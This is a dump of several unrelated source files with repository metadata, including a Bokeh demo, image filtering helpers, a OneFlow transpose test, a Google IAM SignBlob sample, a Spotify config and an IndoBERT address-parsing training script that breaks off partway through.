utilities = read_utilities_from_file(filepath + "/utilities.csv")
raw_rates = read_rates_from_file(filepath + "/rates.csv")
raw_state_probs = read_states_from_file(filepath + "/state_probs.csv")
reconstructed_rates = reconstruct_rates(
raw_rates,
system_capacity=system_capacity,
buffer_capacity=buffer_capacity,
threshold=threshold,
)
reconstructed_state_probs = reconstruct_state_probabilities(
states_from_file=raw_state_probs,
system_capacity=system_capacity,
buffer_capacity=buffer_capacity,
)
return utilities, reconstructed_rates, reconstructed_state_probs
def plot_utilities_and_weighted_rates(
filepath, num_of_servers, threshold, system_capacity, buffer_capacity
):
"""
Calculate the utilities, rates and state probabilities from file and plot
them.
"""
utils, rates, state_probs = get_utilities_rates_and_state_probs(
filepath=filepath,
threshold=threshold,
system_capacity=system_capacity,
buffer_capacity=buffer_capacity,
)
get_plots(
utilities=utils,
all_rates=rates,
all_state_probs=state_probs,
num_of_servers=num_of_servers,
)
|
[
"noreply@github.com"
] |
noreply@github.com
|
0b684c99ea79b5699e5e6d3ae3e126bcb13269bb
|
cd829aa60c3716b7509d028437b78f953e86da34
|
/myapp.py
|
3596b6c79bd649d94b224f84cf94ca4373faf036
|
[] |
no_license
|
raghavkgarg/pytutorial
|
fc893e7945c137e94a3aeef085ec175530434476
|
5971bd3b5cb4f5a459b17d02ea59830f167f2c75
|
refs/heads/master
| 2020-07-08T11:03:31.793145
| 2016-08-23T18:20:26
| 2016-08-23T18:20:26
| 66,391,869
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
import numpy as np
from bokeh.models import Button
from bokeh.palettes import RdYlBu3
from bokeh.plotting import figure, curdoc, vplot
# create a plot and style its properties
p = figure(x_range=(0, 100), y_range=(0, 100), toolbar_location=None)
p.border_fill_color = 'black'
p.background_fill_color = 'black'
p.outline_line_color = None
p.grid.grid_line_color = None
# add a text renderer to our plot (no data yet)
r = p.text(x=[], y=[], text=[], text_color=[], text_font_size="20pt",
text_baseline="middle", text_align="center")
i = 0
ds = r.data_source
# create a callback that will add a number in a random location
def callback():
global i
ds.data['x'].append(np.random.random()*70 + 15)
ds.data['y'].append(np.random.random()*70 + 15)
ds.data['text_color'].append(RdYlBu3[i%3])
ds.data['text'].append(str(i))
ds.trigger('data', ds.data, ds.data)
i = i + 1
# add a button widget and configure with the call back
button = Button(label="Press Me")
button.on_click(callback)
# put the button and plot in a layout and add to the document
curdoc().add_root(vplot(button, p))
|
[
"raghav.garg21@gmail.com"
] |
raghav.garg21@gmail.com
|
af132b52a2a42c7eb350dd3fad4e62461d23f6d3
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03548/s330099741.py
|
473abd697eb7a23e0c786ec6a00b442861d84293
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 118
|
py
|
#!/usr/bin/python
# -*- Coding: utf-8 -*-
x, y, z = (int(i) for i in input().split())
n = int((x-z)/(y+z))
print(n)
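# Worked example with hypothetical input "13 3 1": n = int((13 - 1) / (3 + 1)) = 3.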
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
ceab0fc7fa5ef71ff7b8ddb2c812ea071ed34b3a
|
3d468777900a94f5ed2acd859b5c8fb3961072fa
|
/imtools.py
|
e99ee1460753e4a6d48b35c2c71f195ac559dbe4
|
[] |
no_license
|
lgguzman/CVisionexample
|
ae7b571524648bb9dd3045df1fa73eef9338c906
|
c64b7c95afd035f51125c94708ee429ec2b86a60
|
refs/heads/master
| 2020-03-08T21:08:21.817328
| 2018-04-06T13:49:53
| 2018-04-06T13:49:53
| 128,400,291
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
import os
from numpy import *
from scipy.ndimage import filters
def get_imlist(path):
return [os.path.join(path, f) for f in os.listdir(path) if f.endswith('.jpg') or f.endswith('.jpeg')]
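# histeq performs histogram equalization: it builds the grey-level histogram of the
# flattened image, turns its cumulative sum into a 0-255 lookup table, and remaps
# every pixel through that table, returning the equalized image and the CDF.
# Hypothetical usage (assumes a greyscale image loaded as a float array):
#   from PIL import Image
#   im = array(Image.open('empire.jpg').convert('L'))
#   im2, cdf = histeq(im)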
def histeq(im, nbr_bins =256):
    # numpy removed the 'normed' argument from histogram; 'density' is the equivalent.
    imhist, bins = histogram(im.flatten(), nbr_bins, density=True)
cdf = imhist.cumsum()
cdf = 255 * cdf / cdf[-1]
im2 = interp(im.flatten(), bins[:-1], cdf)
return im2.reshape(im.shape), cdf
def sobel_filter_ix(im):
imx = zeros(im.shape)
filters.sobel(im, 1, imx)
return imx
def sobel_filter_iy(im):
imy = zeros(im.shape)
filters.sobel(im, 0, imy)
return imy
def sobel_filter_magnitud(im):
return sqrt(sobel_filter_ix(im)**2+sobel_filter_iy(im)**2)
def gaussian_filter_ix(im, sigma = 5):
imx = zeros(im.shape)
filters.gaussian_filter(im,(sigma, sigma), (0, 1), imx)
return imx
def gaussian_filter_iy(im, sigma = 5):
imy = zeros(im.shape)
filters.gaussian_filter(im, (sigma, sigma), (1, 0), imy)
return imy
def gaussian_filter_magnitud(im , sigma = 5):
    # Combine the two squared gradients with '+'; the original passed them as two
    # separate arguments to sqrt, unlike sobel_filter_magnitud above.
    return sqrt(gaussian_filter_ix(im, sigma)**2 +
                gaussian_filter_iy(im, sigma)**2)
|
[
"ing.luis.guzman.reyes@gmail.com"
] |
ing.luis.guzman.reyes@gmail.com
|
20a9aad0196588ee85844a524186b9c74f485d9b
|
63862669b6b428ef23e2733e50b47ef7a11ceb60
|
/basic info/varia.py
|
ce978e8d87db873269e2593e3bcd2404f720095d
|
[] |
no_license
|
CyborgVillager/Learning_py_info
|
961fde2cdba7ec0b7e1aacd437aeba99083cd192
|
a1504ab4610f88ae2de738a49ac6513c3358a177
|
refs/heads/master
| 2020-11-25T22:17:33.966387
| 2020-02-11T04:34:29
| 2020-02-11T04:34:29
| 228,869,781
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
#variables
def story_example():
name = "John"
age = 25
para0 = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. In interdum, odio et feugiat auctor, ante leo t" \
"incidunt tortor, sed lacinia leo augue vel lorem. In rutrum est libero"
para1 = "Nunc euismod magna in diam finibus sollicitudin. Aliquam commodo tortor lorem, in tincidunt quam dapibus " \
"fringilla. Duis vitae sem ut ligula efficitur varius."
print(name, 'is age', str(age), para0, '\n', name, para1)
def story_start():
story_example()
story_start()
|
[
"almawijonathan@gmail.com"
] |
almawijonathan@gmail.com
|
1fe26b687dbd81149de336083512b6e7129e88d1
|
2eb779146daa0ba6b71344ecfeaeaec56200e890
|
/python/oneflow/compatible/single_client/test/ops/test_transpose.py
|
02117e32289d49fe2caa7a1e4f230115958caf6e
|
[
"Apache-2.0"
] |
permissive
|
hxfxjun/oneflow
|
ee226676cb86f3d36710c79cb66c2b049c46589b
|
2427c20f05543543026ac9a4020e479b9ec0aeb8
|
refs/heads/master
| 2023-08-17T19:30:59.791766
| 2021-10-09T06:58:33
| 2021-10-09T06:58:33
| 414,906,649
| 0
| 0
|
Apache-2.0
| 2021-10-09T06:15:30
| 2021-10-08T08:29:45
|
C++
|
UTF-8
|
Python
| false
| false
| 4,027
|
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import unittest
from collections import OrderedDict
import numpy as np
import tensorflow as tf
import test_global_storage
from test_util import GenArgList
import oneflow.compatible.single_client.unittest
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client import typing as tp
gpus = tf.config.experimental.list_physical_devices("GPU")
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
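# compare_with_tensorflow builds a OneFlow training job that transposes a random
# variable with the given perm and runs one SGD step, then recomputes the transpose
# and its gradient with tf.GradientTape and asserts that outputs and gradients match
# to within 1e-5.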
def compare_with_tensorflow(device_type, input_shape, perm):
assert device_type in ["gpu", "cpu"]
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
@flow.global_function(type="train", function_config=func_config)
def TransposeJob():
with flow.scope.placement(device_type, "0:0"):
x = flow.get_variable(
"input",
shape=input_shape,
dtype=flow.float,
initializer=flow.random_uniform_initializer(minval=2, maxval=5),
trainable=True,
)
loss = flow.transpose(x, perm)
flow.optimizer.SGD(
flow.optimizer.PiecewiseConstantScheduler([], [0.0001]), momentum=0
).minimize(loss)
flow.watch(x, test_global_storage.Setter("x"))
flow.watch_diff(x, test_global_storage.Setter("x_diff"))
flow.watch(loss, test_global_storage.Setter("loss"))
flow.watch_diff(loss, test_global_storage.Setter("loss_diff"))
return loss
of_out = TransposeJob().get()
with tf.GradientTape(persistent=True) as tape:
x = tf.Variable(test_global_storage.Get("x"))
tf_out = tf.transpose(x, perm)
loss_diff = test_global_storage.Get("loss_diff")
tf_x_diff = tape.gradient(tf_out, x, loss_diff)
assert np.allclose(of_out.numpy(), tf_out.numpy(), rtol=1e-05, atol=1e-05)
assert np.allclose(
test_global_storage.Get("x_diff"), tf_x_diff.numpy(), rtol=1e-05, atol=1e-05
)
@flow.unittest.skip_unless_1n1d()
class TestTranspose(flow.unittest.TestCase):
def test_transpose(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(10, 11, 12, 13)]
arg_dict["perm"] = [(2, 0, 1, 3), (1, 0, 2, 3), (3, 2, 1, 0), (3, 1, 2, 0)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_transpose2(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(10, 11, 12)]
arg_dict["perm"] = [(2, 0, 1), (1, 0, 2), (2, 1, 0), (1, 2, 0)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_transpose3(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(10, 11)]
arg_dict["perm"] = [(1, 0), (0, 1)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
def test_transpose_dim6(test_case):
arg_dict = OrderedDict()
arg_dict["device_type"] = ["gpu", "cpu"]
arg_dict["input_shape"] = [(2, 3, 4, 5, 6, 7)]
arg_dict["perm"] = [(2, 0, 1, 3, 5, 4)]
for arg in GenArgList(arg_dict):
compare_with_tensorflow(*arg)
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
8fa4de3bff6962cb85451b714b9b0e03e4eec89b
|
fb47e95101efd3b3a40ac73dcf58ed0440dec928
|
/find missing number in the series.py
|
fedd41ede866e30cd091191227488c8fe132df98
|
[
"MIT"
] |
permissive
|
sundar369/coding
|
5a474f471041061b859795b6190793f19a1bcbc1
|
d5e99623f055a39604351752d494c1c8817d6d91
|
refs/heads/main
| 2022-12-19T15:55:11.584832
| 2020-10-21T06:43:27
| 2020-10-21T06:43:27
| 305,928,000
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
n = int(input())
arr = list(map(int,input().split()))
dif = int((arr[-1] - arr[0])/n)
inc = 1
ele = arr[0]
while True:
ele += dif
if ele != arr[inc]:
print(ele)
break
inc += 1
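# Worked example with hypothetical input: n = 5 and arr = [2, 4, 6, 10, 12] give
# dif = int((12 - 2) / 5) = 2; stepping 2 -> 4 -> 6 -> 8, the value 8 differs from
# arr[3] = 10, so 8 is printed as the missing element of the series.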
|
[
"noreply@github.com"
] |
noreply@github.com
|
b057a3a5c3f3098da54c67a78d50a565061a32c3
|
0dfa97730b9ad9c077868a045d89cc0d4b09f433
|
/tests/integration/goldens/credentials/samples/generated_samples/iamcredentials_generated_credentials_v1_iam_credentials_sign_blob_sync.py
|
ff60375d5635f5825a6f29c36bb0c61572147d95
|
[
"Apache-2.0"
] |
permissive
|
anukaal/gapic-generator-python
|
546c303aaf2e722956133b07abb0fb1fe581962f
|
e3b06895fa179a2038ee2b28e43054e1df617975
|
refs/heads/master
| 2023-08-24T23:16:32.305652
| 2021-10-09T15:12:14
| 2021-10-09T15:12:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,567
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for SignBlob
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-iam-credentials
# [START iamcredentials_generated_credentials_v1_IAMCredentials_SignBlob_sync]
from google.iam import credentials_v1
def sample_sign_blob():
"""Snippet for sign_blob"""
# Create a client
client = credentials_v1.IAMCredentialsClient()
# Initialize request argument(s)
request = credentials_v1.SignBlobRequest(
name="projects/{project}/serviceAccounts/{service_account}",
payload=b'payload_blob',
)
# Make the request
response = client.sign_blob(request=request)
# Handle response
print(response)
# [END iamcredentials_generated_credentials_v1_IAMCredentials_SignBlob_sync]
|
[
"noreply@github.com"
] |
noreply@github.com
|
f9472b9609eb5b6bde651f529d644276ff63fe2c
|
ab73f80a80d77d826ae347bdea7f74f93cf71c3c
|
/python/tests/test_array_reverse.py
|
a3a26d9c1a0ae1b83ad77df70505d167f5c22695
|
[] |
no_license
|
moh-ash96/data-structures-and-algorithms
|
4c7f7b7598d50bfc0fc96f20751598aa412a26d6
|
bc42163393aa835c9e763e6848335c8a14cc2832
|
refs/heads/master
| 2023-06-03T21:37:14.740791
| 2021-06-29T14:48:12
| 2021-06-29T14:48:12
| 348,101,936
| 0
| 3
| null | 2021-06-29T14:27:49
| 2021-03-15T19:44:23
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 265
|
py
|
from code_challenges.array_reverse.array_reverse import reverseArray
def test_array ():
assert reverseArray([1, 2, 3, 4, 5, 6]) == [6, 5, 4, 3, 2, 1]
assert reverseArray([89, 2354, 3546, 23, 10, -923, 823, -12]) == [-12, 823, -923, 10, 23, 3546, 2354, 89]
|
[
"moh.ash96@gmail.com"
] |
moh.ash96@gmail.com
|
0870115ce996bd2ba821fa63ddbc96a6a15f12d1
|
badaf185bf21ab3318ef340d2c5b428f1f83f43f
|
/snmp/ex4_week2.py
|
fde07320ad5d75e856a29e4065542052833d47a1
|
[
"Apache-2.0"
] |
permissive
|
cfalco73/python_class
|
48259956f047c8fc32430b16a0335bc782b2d7e3
|
a2a0628c6f3480d502816d34b7ba05d974feca0a
|
refs/heads/master
| 2021-04-12T08:08:49.424416
| 2018-04-13T21:23:48
| 2018-04-13T21:23:48
| 126,092,245
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 580
|
py
|
#!/usr/bin/env python
from __future__ import print_function, unicode_literals
from snmp_helper import snmp_get_oid,snmp_extract
COMMUNITY_STRING = 'galileo'
SNMP_PORT = 161
MIB_DESC = '1.3.6.1.2.1.1.1.0'
MIB_NAME = '1.3.6.1.2.1.1.5.0'
router_1 = ("184.105.247.70", COMMUNITY_STRING, SNMP_PORT)
router_2 = ("184.105.247.71", COMMUNITY_STRING, SNMP_PORT)
for router_device in (router_1, router_2):
for oid_info in (MIB_DESC, MIB_NAME):
snmp_info = snmp_get_oid(router_device, oid=oid_info)
output = snmp_extract(snmp_info)
print (output)
print()
|
[
"carlo_falco@hotmail.com"
] |
carlo_falco@hotmail.com
|
da0a868e0dc20cb2ab7909a7a40490865620d82e
|
2a409a3f43fdbad202e9827e4fffd615a734c78b
|
/spotifylyrics/config.py
|
56ac99332601cb8675a52a1bf3468090829627c8
|
[
"MIT"
] |
permissive
|
Turreted/Spotify-Lyrics
|
db2c9e4f3de2441ce5874a9a5932866464451d86
|
6bbbf6c29f6183536668e557e8aebe70a0d2f5e3
|
refs/heads/master
| 2021-06-19T03:10:58.723203
| 2021-06-13T14:31:05
| 2021-06-13T14:31:05
| 176,770,294
| 24
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
import os
import pathlib
"""
Defines application constants
"""
# Spotify application constants
# the unique id for the Spotify application used to read data
CLIENT_ID = "cabed21db9c54f13b906e562bc864c26"
REDIRECT_URI = "http://localhost:8080/callback/"
# directory constants, not meant to be used directly by program
__dir_path = os.path.dirname(os.path.realpath(__file__))
__project_root = pathlib.Path(__dir_path).parent
SECRETS_CACHE = os.path.join(__dir_path, "cache/secrets.json")
|
[
"gideonmitchell01@gmail.com"
] |
gideonmitchell01@gmail.com
|
94d7d573288eb90d05e576a11a91c7c3562fa982
|
231c81317b3ae93237cc3a6f55f924c8bc3cadf3
|
/loca_test_v2_lang.py
|
dc314e071e5a1e97f82a8912ca306e6c2a1aaf53
|
[] |
no_license
|
qianpeisheng/indo
|
2acd394051ee0f18dc01a8577d4a60507888a8a1
|
2abe017c61eb33d466d382d92614e56e2605a663
|
refs/heads/main
| 2023-03-24T07:52:43.350718
| 2021-03-20T18:56:48
| 2021-03-20T18:56:48
| 348,845,962
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,986
|
py
|
import os
import torch
from datasets import load_dataset
from torch import nn
import torch.nn.functional as F
from transformers import (AutoModel, BertTokenizer, AutoConfig, DataCollatorForLanguageModeling) # AutoModelForMaskedLM
from torch.utils.data import DataLoader, random_split # AutoTokenizer
from torchvision import transforms
import pytorch_lightning as pl
from pytorch_lightning.callbacks import ModelCheckpoint
import gzip
import csv
from sklearn.metrics import accuracy_score
from tokenizers import Tokenizer
from tokenizers.models import BPE
from tokenizers.trainers import BpeTrainer
from tokenizers.pre_tokenizers import Whitespace
import pandas as pd
import datetime
# Configs
model_name = 'indobenchmark/indobert-lite-base-p1'
max_seq_length = 167 # for train and test
preprocessing_num_workers = 4
batch_size=2048 # depend on gpu memory
# utils
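# get_pos returns, for each sequence in the batch, the argmax positions of two output
# channels of the span head (index1 = start, index2 = end). It zeroes both positions
# when the classification output cls_ indicates that the entity type is absent:
# channels 0/1 carry POI spans (absent when cls_ is 0 or 2) and channels 2/3 carry
# street spans (absent when cls_ is 0 or 1).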
def get_pos(index1, index2, embedding, cls_):
val1, pos1 = torch.max(embedding[:,:,index1], dim=1)
val2, pos2 = torch.max(embedding[:,:,index2], dim=1)
for i, v in enumerate(cls_):
if index2 < 2: # poi
if v == 0 or v == 2:
pos1[i] = 0
pos2[i] = 0
else: # street
if v == 0 or v == 1:
pos1[i] = 0
pos2[i] = 0
return pos1, pos2
# out[0] **is** out.last_hidden_state
class IndBert(nn.Module):
def __init__(self):
super(IndBert, self).__init__()
model = AutoModel.from_pretrained(model_name)
model.resize_token_embeddings(30521)
# https://github.com/huggingface/transformers/issues/4153
self.bert = model
self.linear = nn.Linear(in_features=768, out_features=4, bias=True)
# 4 for poi start and end, street start and end
self.linear_cls = nn.Linear(in_features=768, out_features=4, bias=True)
def forward(self, input_ids, attention_mask, token_type_ids):
out = self.bert(input_ids, attention_mask, token_type_ids)# (hidden_state, pooled_out)
out_sentence = out.last_hidden_state[:,1:,:]
out_cls = out.last_hidden_state[:,0,:]
out_cls = self.linear_cls(out_cls)
out_sentence = self.linear(out_sentence)
return out_cls, out_sentence
class My_lm(pl.LightningModule):
def __init__(self):
super().__init__()
# self.save_hyperparameters()
# config = AutoConfig.from_pretrained(
# model_name_or_path=model_name, return_dict=True)
self.model = IndBert()
def forward(self, input_ids, attention_mask, token_type_ids):
# in lightning, forward defines the prediction/inference actions
out_cls, embedding = self.model(input_ids, attention_mask, token_type_ids)
return out_cls, embedding
def reshape_(self, x):
_x = torch.stack(x,dim=0)
_x = torch.transpose(_x , 0, 1)
return _x
def training_step(self, batch, batch_idx):
        # training_step defines the train loop. It is independent of forward.
        # batch
input_ids = batch['input_ids']
input_ids = self.reshape_(input_ids)
attention_mask = batch['attention_mask']
attention_mask = self.reshape_(attention_mask)
token_type_ids = batch['token_type_ids']
token_type_ids = self.reshape_(token_type_ids)
poi_start = batch['POI'][0]
poi_end = batch['POI'][1]
street_start = batch['street'][0]
street_end = batch['street'][1]
out_cls, embedding = self(input_ids, attention_mask, token_type_ids)
# loss
cls_loss = F.cross_entropy(out_cls, batch['cls_label'])
# compute poi loss, where cls label =1 or 3
poi_mask = batch['cls_label'] %2 == 1
poi_loss = 0
for index, poi in enumerate(poi_mask):
if poi:
poi_loss += F.cross_entropy(embedding[index,:,0].unsqueeze(dim=0), poi_start[index].unsqueeze(dim=0))
poi_loss += F.cross_entropy(embedding[index,:,1].unsqueeze(dim=0), poi_end[index].unsqueeze(dim=0))
# compute street loss, where cls label =2 or 3 (3 is calculated above)
street_mask = batch['cls_label'] == 2
street_loss = 0
for index, street in enumerate(street_mask):
if street:
street_loss += F.cross_entropy(embedding[index,:,2].unsqueeze(dim=0), street_start[index].unsqueeze(dim=0))
street_loss += F.cross_entropy(embedding[index,:,3].unsqueeze(dim=0), street_end[index].unsqueeze(dim=0))
total_loss = (cls_loss + poi_loss + street_loss)/3 # consider scale cls_loss larger, as found in Squad 2.0 paper
self.log('train_loss', total_loss, on_step=True, prog_bar=True)
self.log('cls_loss', cls_loss, on_step=True)
self.log('poi_loss', poi_loss, on_step=True)
self.log('street_loss', street_loss, on_step=True)
return {'loss': total_loss, 'cls': cls_loss, 'poi': poi_loss, 'street': street_loss} # must contrain key loss
# https://github.com/PyTorchLightning/pytorch-lightning/issues/2783#issuecomment-710615867
def training_epoch_end(self, train_step_outs):
epoch_train_loss = 0
epoch_cls_loss = 0
epoch_poi_loss = 0
epoch_street_loss = 0
for d in train_step_outs:
epoch_train_loss += d['loss']
epoch_cls_loss += d['cls']
epoch_poi_loss += d['poi']
epoch_street_loss += d['street']
self.log('loss', epoch_train_loss/len(train_step_outs), on_epoch=True, prog_bar=True)
self.log('poi_start', epoch_cls_loss/len(train_step_outs), on_epoch=True, prog_bar=True)
self.log('poi_end', epoch_poi_loss/len(train_step_outs), on_epoch=True, prog_bar=True)
self.log('street_start', epoch_street_loss/len(train_step_outs), on_epoch=True, prog_bar=True)
def validation_step(self, batch, index):
# batch
input_ids = batch['input_ids']
input_ids = self.reshape_(input_ids)
attention_mask = batch['attention_mask']
attention_mask = self.reshape_(attention_mask)
token_type_ids = batch['token_type_ids']
token_type_ids = self.reshape_(token_type_ids)
poi_start = batch['POI'][0]
poi_end = batch['POI'][1]
street_start = batch['street'][0]
street_end = batch['street'][1]
out_cls, embedding = self(input_ids, attention_mask, token_type_ids)
# loss
cls_loss = F.cross_entropy(out_cls, batch['cls_label'])
# compute poi loss, where cls label =1 or 3
poi_mask = batch['cls_label'] %2 == 1
poi_loss = 0
for index, poi in enumerate(poi_mask):
if poi:
poi_loss += F.cross_entropy(embedding[index,:,0].unsqueeze(dim=0), poi_start[index].unsqueeze(dim=0))
poi_loss += F.cross_entropy(embedding[index,:,1].unsqueeze(dim=0), poi_end[index].unsqueeze(dim=0))
# compute street loss, where cls label =2 or 3 (3 is calculated above)
street_mask = batch['cls_label'] == 2
street_loss = 0
for index, street in enumerate(street_mask):
if street:
street_loss += F.cross_entropy(embedding[index,:,2].unsqueeze(dim=0), street_start[index].unsqueeze(dim=0))
street_loss += F.cross_entropy(embedding[index,:,3].unsqueeze(dim=0), street_end[index].unsqueeze(dim=0))
total_loss = (cls_loss + poi_loss + street_loss)/3
# acc
_, cls_ = torch.max(out_cls, dim=1)
pred_poi_start, pred_poi_end = get_pos(0,1, embedding, cls_)
pred_street_start, pred_street_end = get_pos(2,3, embedding, cls_)
def get_acc(pred, gt):
return torch.tensor(accuracy_score(pred.cpu(), gt.cpu()))
val_accs = [get_acc(pred_poi_start, poi_start), get_acc(pred_poi_end, poi_end), get_acc(pred_street_start, street_start), get_acc(pred_street_end, street_end)]
self.log('val_loss', total_loss, on_step=True)
self.log('poi_start', val_accs[0], on_step=True)
self.log('poi_end', val_accs[1], on_step=True)
self.log('street_start', val_accs[2], on_step=True)
self.log('street_end', val_accs[3], on_step=True)
return {'val_loss': total_loss, 'poi_start': val_accs[0], 'poi_end': val_accs[1], 'street_start': val_accs[2], 'street_end': val_accs[3]}
# may use F1 to measure the performance
def validation_epoch_end(self, valid_step_outs):
epoch_val_loss = 0
epoch_accs = [0,0,0,0]
for d in valid_step_outs:
epoch_val_loss += d['val_loss']
epoch_accs[0] += d['poi_start']
epoch_accs[1] += d['poi_end']
epoch_accs[2] += d['street_start']
epoch_accs[3] += d['street_end']
self.log('val_loss', epoch_val_loss/len(valid_step_outs), on_epoch=True, prog_bar=True)
self.log('poi_start', epoch_accs[0]/len(valid_step_outs), on_epoch=True, prog_bar=True)
self.log('poi_end', epoch_accs[1]/len(valid_step_outs), on_epoch=True, prog_bar=True)
self.log('street_start', epoch_accs[2]/len(valid_step_outs), on_epoch=True, prog_bar=True)
self.log('street_end', epoch_accs[3]/len(valid_step_outs), on_epoch=True, prog_bar=True)
def test_step(self, batch, batch_idx):
# batch
input_ids = batch['input_ids']
input_ids = self.reshape_(input_ids)
attention_mask = batch['attention_mask']
attention_mask = self.reshape_(attention_mask)
token_type_ids = batch['token_type_ids']
token_type_ids = self.reshape_(token_type_ids)
out_cls, embedding = self(input_ids, attention_mask, token_type_ids)
# map ids to tokens
_, cls_ = torch.max(out_cls, dim=1)
pred_poi_start, pred_poi_end = get_pos(0,1, embedding, cls_)
pred_street_start, pred_street_end = get_pos(2,3, embedding, cls_)
tokenizer = BertTokenizer.from_pretrained("indobenchmark/indobert-base-p1") # make this global
def decode_(pred_start, pred_end):
rets = []
for index, (start, end) in enumerate(zip(pred_start, pred_end)):
if start == 0 and end == 0:
current_ret = ''
else:
# limit end to the length of the input, to avoid [SEP] and [PAD]
# Note that decoder skips special tokens, so end may > len(input_ids)
current_input_ids = input_ids[index]
end = min(len(current_input_ids), end)
current_ret = tokenizer.decode(current_input_ids[start+1:end+1], skip_special_tokens=True)
rets.append(current_ret)
return rets
pois = decode_(pred_poi_start, pred_poi_end)
streets = decode_(pred_street_start, pred_street_end)
return (pois, streets)
def test_epoch_end(self, test_outs):
# save file
answers = []
for pois, streets in test_outs:
for poi, street in zip(pois, streets):
answers.append(poi+'/'+street)
df_answer = pd.DataFrame({'id': range(len(answers)), 'POI/street': answers})
filename1 = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
df_answer.to_csv(filename1+'.csv', index=False)
return filename1
def configure_optimizers(self):
return torch.optim.Adam(self.parameters(), lr=3e-05, eps=1e-08) # check requires grad
# 3e-5
class Dm(pl.LightningDataModule):
def __init__(self, batch_size=batch_size):
super().__init__()
self.train_file = 'train.csv'
self.valid_file = 'train.csv'
self.test_file = 'test.csv'
self.batch_size = batch_size
# When doing distributed training, Datamodules have two optional arguments for
# granular control over download/prepare/splitting data:
# OPTIONAL, called for every GPU/machine (assigning state is OK)
def setup(self, stage=None):
# step is either 'fit', 'validate', 'test', or 'predict'. 90% of the time not relevant
# load dataset
# datasets = load_dataset('csv', data_files='train.csv', split=['train[:80%]', 'train[80%:]'])
# column_names = ['id', 'raw_address', 'POI/street']
tokenizer = BertTokenizer.from_pretrained("indobenchmark/indobert-base-p1")
#pad 0 https://huggingface.co/transformers/model_doc/bert.html
def tokenize_fn(entry):
encoded = tokenizer.encode(entry['raw_address'])
# also handle the labels here
def find_sublist(lst1, lst2):
lst1 = lst1[1:len(lst1)-1]
lst2 = lst2[1:len(lst2)-1]
if len(lst1) == 0 or len(lst2) == 0:
return (0, 0)
for i in range(len(lst2)-len(lst1)+1):
if lst2[i:i+len(lst1)] == lst1:
# return i+1, i+len(lst1)+1
return i, i+len(lst1) # [TODO] debug on this plus 1 due to splitting [CLS] at start of sequence
else:
return (0, 0) # -1 triggers index out of bound error
labels = entry['POI/street'].split('/')
encoded_poi = tokenizer.encode(labels[0])
entry_poi_pos = find_sublist(encoded_poi, encoded)
encoded_street = tokenizer.encode(labels[1])
entry_street_pos = find_sublist(encoded_street, encoded)
cls_label = 0
if labels[0]:
cls_label += 1
if labels[1]:
cls_label += 2
return {'POI':entry_poi_pos, 'street': entry_street_pos, 'cls_label': cls_label}
# datasets = [dataset.map(lambda entries: tokenizer(entries['raw_address'], padding=True), batched=True, batch_size=batch_size, num_proc=1) for dataset in datasets]
# tokenized_d_train, tokenized_d_valid = [dataset.map(tokenize_fn, num_proc=preprocessing_num_workers) for dataset in datasets] # attempts to avoid size mismatch
# self.train_dataset = tokenized_d_train
# self.valid_dataset = tokenized_d_valid
# test dataset
# see how it performs on train
test_d = load_dataset('csv', data_files='test.csv', split='train[:100%]') # adjust the ratio for debugging
tokenized_d_test = test_d.map(lambda entries: tokenizer(entries['raw_address'], padding=True), batched=True, batch_size=batch_size, num_proc=1)
self.test_dataset = tokenized_d_test# ['train'] # named by the dataset module
def train_dataloader(self):
